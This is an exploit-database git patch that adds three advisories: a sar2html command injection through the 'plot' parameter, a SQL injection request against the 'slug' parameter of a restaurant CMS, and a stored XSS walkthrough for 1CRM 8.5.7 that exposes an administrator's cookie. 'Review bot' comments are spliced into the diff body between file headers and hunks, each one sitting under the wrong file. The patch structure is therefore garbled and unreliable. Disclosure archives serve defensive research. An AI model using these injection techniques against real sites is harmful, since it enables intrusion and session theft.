From 5cabe1e1de4df01005a14dc1d5d592b6acb5c678 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 3 Aug 2019 05:02:16 +0000
Subject: [PATCH] DB: 2019-08-03
3 changes to exploits/shellcodes
Ultimate Loan Manager 2.0 - Cross-Site Scripting
WebIncorp ERP - SQL injection
Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery
Ultimate Loan Manager 2.0 - Cross-Site Scripting
WebIncorp ERP - SQL injection
Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery
Sar2HTML 3.2.1 - Remote Command Execution
Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
---
 exploits/php/webapps/47204.txt | 13 +++++
 exploits/php/webapps/47205.txt | 18 +++++++
 exploits/php/webapps/47206.txt | 99 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 9 ++--
 4 files changed, 136 insertions(+), 3 deletions(-)
 create mode 100644 exploits/php/webapps/47204.txt
 create mode 100644 exploits/php/webapps/47205.txt
 create mode 100644 exploits/php/webapps/47206.txt
diff --git a/exploits/php/webapps/47204.txt b/exploits/php/webapps/47204.txt
new file mode 100644
index 000000000..994f956bd
--- /dev/null
+++ b/exploits/php/webapps/47204.txt
@@ -0,0 +1,13 @@
+# Exploit Title: sar2html Remote Code Execution
+# Date: 01/08/2019
+# Exploit Author: Furkan KAYAPINAR
+# Vendor Homepage:https://github.com/cemtan/sar2html
+# Software Link: https://sourceforge.net/projects/sar2html/
+# Version: 3.2.1
+# Tested on: Centos 7
+
+In web application you will see index.php?plot url extension.
+
+http:///index.php?plot=; will execute
+the command you entered. After command injection press "select # host" then your command's
+output will appear bottom side of the scroll screen.
\ No newline at end of file
diff --git a/exploits/php/webapps/47205.txt b/exploits/php/webapps/47205.txt
new file mode 100644
index 000000000..50fc2913c
--- /dev/null
+++ b/exploits/php/webapps/47205.txt
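Review bot: The author recorded for 47204 is inconsistent: this file's header says `# Exploit Author: Furkan KAYAPINAR`, while the files_exploits.csv row added in the last hunk credits "Cemal Cihad ÇİFTÇİ"; one of the two should be corrected before the entry is indexed. The header also carries no CVE or fix reference, so a reader cannot tell whether 3.2.1 is the last affected release; a line such as `# Fixed in: <unknown at time of writing>` (or the vendor's fixed release, if known) would make that explicit. Minor: `# Vendor Homepage:https://...` lacks the space after the colon used by the other header lines, and the PoC line `http:///index.php?plot=;` appears to have lost its bracketed placeholders in extraction, so the sentence that follows no longer reads as written.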
@@ -0,0 +1,18 @@
+# Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection
+# Date: 1.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154
+# CWE : CWE-89
+
+Vulnerable parameter: slug (news.php)
+
+[GET Request]
+
+GET //host/[path]/news.php?slug=x' HTTP/1.1
+Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US
+Cache-Control: max-age=0
+Cookie: PHPSESSID=87e839a144a7c326454406dea88b92bc
+Host: host
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
\ No newline at end of file
diff --git a/exploits/php/webapps/47206.txt b/exploits/php/webapps/47206.txt
new file mode 100644
index 000000000..ca5b17ee9
--- /dev/null
+++ b/exploits/php/webapps/47206.txt
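Review bot: The captured request's `Cookie:` line carries what looks like a real PHPSESSID value; a published advisory should replace it with a placeholder such as `Cookie: PHPSESSID=<session-id>`, since the header plays no part in the injection point and a live token should never be committed. The header block also omits the `# Version:` and `# Tested on:` fields the sibling entries carry, and `# Date: 1.8.2019.` has a stray trailing period, so the affected release range is undocumented; add `# Version: <affected version>` or state that it is unknown. Since the entry already tags `# CWE : CWE-89`, one sentence naming the expected remediation (a parameterised query for `slug` in news.php) would tell a reader what the fix looks like.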
@@ -0,0 +1,99 @@
+******************************************************************
+* 1CRM On-Premise Software 8.5.7 *
+* Stored XSS *
+******************************************************************
+
+
+////////////////////////////////////////////////////////////////////////////////////
+
+# Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting
+# Date: 19/07/2019
+# Exploit Author: Kusol Watchara-Apanukorn
+# Vendor Homepage: https://1crm.com/
+# Version: 8.5.7 <=
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-14221
+////////////////////////////////////////////////////////////////////////////////////
+
+
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+1CRM On-Premise Software 8.5.7 allows XSS via a payload that is
+mishandled during a Run Report operation. ///
+
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+
+Vulnerability Description:
+
+XSS flaws occur whenever an application includes untrusted data in a
+new web page without proper validation or escaping, or updates an
+existing web page with user supplied data using a browser API that can
+create JavaScript. XSS allows attackers to execute scripts in the
+victim’s browser which can hijack user sessions, deface web sites, or
+redirect the user to malicious sites.
+
+
+########################################################################################################################
+Attack Narratives and Scenarios:
+ #
+
+ #
+**Attacker**
+ #
+1. Login as any user
+ #
+2. Click Email icon
+ #
+3. Click Report
+ #
+4. Click Create Report
+ #
+5. Fill Report Name (In our case we fill Company B)
+ #
+6. Assign to Victim (In our case we assigned to admin)
+ #
+7. Click Column Layout
+ #
+8. Click Add empty column
+ #
+9. Input malicious code (In our case:
+)
+ #
+10. Click Save
+ #
+
+ #
+**Victim**
+ #
+1. Click email icon
+ #
+2. Click Report
+ #
+3. Choose report that we recently created (In our case we choose
+Company B) #
+4. Click Run Report
+ #
+5. Admin cookie will popup
+ #
+########################################################################################################################
+
+PoC
+
+-----------------------------------------
+
+Github: https://github.com/cccaaasser/1CRM-CVE/blob/master/CVE-2019-14221.md
+
+
+Vulnerability Disclosure Timeline:
+==================================
+
+19 July, 19 : Found Vulnerability
+
+19 July, 19 : Vendor Notification
+
+24 July 19 : Vendor Response
+
+24 July 19 : Vendor Fixed
+
+31 July, 19 : Vendor released new patched version 8.5.10
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ea6578c73..c8dad72a4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
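Review bot: `# Version: 8.5.7 <=` is ambiguous about which side of 8.5.7 is affected; the disclosure timeline at the end records the fix in 8.5.10, so `# Version: <= 8.5.7 (fixed in 8.5.10)` states the range unambiguously and puts the remediation where readers look first. Step 9 of the attacker narrative reads `9. Input malicious code (In our case:` followed by a line holding only `)`, so the example value was lost in extraction; rather than restoring it, the step can say that the column value is stored and later rendered unescaped, which is what the description paragraph already conveys. The narrative also shows the stored value executing in the session of whichever user the report is assigned to, so any authenticated user can reach an administrator's session via Run Report; that impact is what makes this stored rather than reflected XSS and is worth one sentence in the description.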
@@ -41569,6 +41569,9 @@ id,file,description,date,author,type,platform,port
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,
 47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,
-47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,
-47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,
-47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,
+47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80
+47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80
+47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,80
+47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80
+47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
+47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80